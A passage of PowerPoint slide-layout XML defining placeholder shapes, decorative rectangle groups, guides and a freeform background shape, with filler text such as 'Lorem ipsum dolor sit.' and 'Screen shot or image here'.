          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3177776" y="3930102"/>
              <a:ext cx="504000" cy="4156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5" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44AB6D80-4B8D-4C13-89A2-8E7CC05E6FEF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3681629" y="3930102"/>
              <a:ext cx="504000" cy="4156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6" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7005CFD-C7CC-4A06-A932-7659192709B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4185482" y="3930101"/>
              <a:ext cx="504000" cy="41565"/>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1645148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6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623393" y="1604798"/>
            <a:ext cx="184731" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Skupina 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148DA292-2A4B-4262-8D5C-99FB6C5F77E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7488392" y="0"/>
            <a:ext cx="4703608" cy="55423"/>
            <a:chOff x="1161776" y="3930101"/>
            <a:chExt cx="3527706" cy="41567"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2381FD13-413F-4305-8CEE-BE2A42508BDA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1161776" y="3930103"/>
              <a:ext cx="504000" cy="41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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99F1F02F-A0C7-4789-9D84-85EA6AD74A6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1665776" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>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1" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFF479B9-7AF3-4AE3-A1F9-3E780BA3C406}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2169776" y="3930103"/>
              <a:ext cx="504000" cy="4156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12" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C252907-3D50-45CC-B198-5B7FBF1C3947}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2673923" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA529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3" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBA5C6A7-58E1-47E8-9A53-0965D5754685}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3177776" y="3930102"/>
              <a:ext cx="504000" cy="4156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4" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A065233-36C9-4D5D-B02F-08DD84DCC1D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3681629" y="3930102"/>
              <a:ext cx="504000" cy="4156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5" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46D519D6-24D2-497E-BAFC-5BE5C912DEA2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4185482" y="3930101"/>
              <a:ext cx="504000" cy="41565"/>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765370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normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="2133"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1867"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="16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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Skupina 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E04326D-DDFB-40E4-B833-285AA60CED19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7488392" y="0"/>
            <a:ext cx="4703608" cy="55423"/>
            <a:chOff x="1161776" y="3930101"/>
            <a:chExt cx="3527706" cy="41567"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B2019E4-DFEF-4C07-AE6D-C96CC22DCA31}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1161776" y="3930103"/>
              <a:ext cx="504000" cy="41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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3FDA0B6-336E-49B8-9D11-B72BED3215DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1665776" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>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0" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96CA4CD9-19AD-47EF-9A05-2B38B3C14C2C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2169776" y="3930103"/>
              <a:ext cx="504000" cy="4156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11" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B9EB408-D685-4A57-B74B-66CA9DDF1F82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2673923" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA529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Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E9C3593-84B8-41B2-A731-7BDCE519DAF8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3177776" y="3930102"/>
              <a:ext cx="504000" cy="4156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3" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E73A79F-7A22-4949-8D8B-ABBEE5FE7920}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3681629" y="3930102"/>
              <a:ext cx="504000" cy="4156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4" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA543C3-CA87-442E-8863-3060EB0585FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4185482" y="3930101"/>
              <a:ext cx="504000" cy="41565"/>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419121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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Skupina 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AF49CDE-E481-4CD6-BAF9-30928C7FE330}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7488392" y="0"/>
            <a:ext cx="4703608" cy="55423"/>
            <a:chOff x="1161776" y="3930101"/>
            <a:chExt cx="3527706" cy="41567"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FF31AD5-FF0F-4BCA-AAC6-A05864B4D32A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1161776" y="3930103"/>
              <a:ext cx="504000" cy="41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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF3257BC-E7EF-45C2-84EF-CBE7FB1E63FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1665776" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>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0" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4834916-B711-4016-84CC-923463085220}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2169776" y="3930103"/>
              <a:ext cx="504000" cy="4156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11" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B63A2519-6634-4662-833E-49DC80977539}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2673923" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA529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Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16283CE3-8076-4B8C-AC1C-41AC411F8AF4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3177776" y="3930102"/>
              <a:ext cx="504000" cy="4156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3" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A2DDE83-F0D1-4B7D-9736-BA63FEFBD774}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3681629" y="3930102"/>
              <a:ext cx="504000" cy="4156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4" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0E2AA71-8A66-4567-A509-4EE1986FD675}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4185482" y="3930101"/>
              <a:ext cx="504000" cy="41565"/>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114143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7018961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247842529"/>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1650742893"/>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3478112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006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5826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919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1800748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73463396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ntent Slide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3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263524" y="1420824"/>
            <a:ext cx="11660789" cy="4852747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C0000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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17"/>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9" name="TextBox 18"/>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37393101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63949" y="289511"/>
            <a:ext cx="11655078" cy="1051560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lorem ipsum dolor sit.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>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3" name="TextBox 12"/>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593776827"/>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917">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="523">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="29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Image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7" name="Picture Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264570" y="1420824"/>
            <a:ext cx="7151167" cy="4852747"/>
          </a:xfrm>
          <a:ln w="152400">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Screen shot or image here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7415737" y="1420824"/>
            <a:ext cx="4508581" cy="4852747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3137">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="336145" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="560241" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="784338" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1008435" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1961"/>
              </a:spcBef>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p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1177" y="6603024"/>
            <a:ext cx="12192313" cy="265884"/>
            <a:chOff x="-1200" y="6644680"/>
            <a:chExt cx="12436794" cy="360970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>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24" name="TextBox 23"/>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30618376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Diagram layout">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Freeform: Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1428466"/>
            <a:ext cx="12191999" cy="5429535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX1" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX2" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY2" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX3" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY3" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX4" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY4" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX5" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY5" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX6" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY6" fmla="*/ 5316786 h 5316786"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY7" fmla="*/ 5316786 h 5316786"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX1" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX2" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY2" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX3" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY3" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX4" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY4" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX5" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY5" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY6" fmla="*/ 5316786 h 5316786"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX1" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5316786"/>
              <a:gd name="connsiteX2" fmla="*/ 12191999 w 12191999"/>
              <a:gd name="connsiteY2" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX3" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY3" fmla="*/ 119540 h 5316786"/>
              <a:gd name="connsiteX4" fmla="*/ 7315199 w 12191999"/>
              <a:gd name="connsiteY4" fmla="*/ 5315056 h 5316786"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY5" fmla="*/ 5316786 h 5316786"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 12191999"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 531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5316786">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12191999" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12191999" y="119540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7315199" y="119540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7315199" y="5315056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5316786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5F2FC"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="896386">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1765" kern="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7692554" y="1889196"/>
            <a:ext cx="3977545" cy="4576917"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx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24464" y="358848"/>
            <a:ext cx="11384209" cy="892552"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
